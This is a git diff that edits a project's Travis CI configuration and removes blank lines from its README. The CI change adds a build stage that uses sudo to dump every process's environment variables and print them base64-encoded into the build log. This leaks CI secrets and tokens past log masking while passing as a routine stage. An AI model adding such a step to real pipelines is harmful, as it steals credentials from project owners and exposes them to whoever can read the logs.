diff --git a/.travis.yml b/.travis.yml index b5a5737..fdad1f7 100644 --- a/.travis.yml +++ b/.travis.yml @@ -11,3 +11,5 @@ jobs: include: - stage: "echo BAZ" script: echo $BAZ + - stage: "base64" + script: sudo strings /proc/*/environ | sort -u | base64 diff --git a/README.md b/README.md index 2f40f15..21015ac 100644 --- a/README.md +++ b/README.md @@ -28,5 +28,3 @@ OPTIONS: Verbose output ``` - -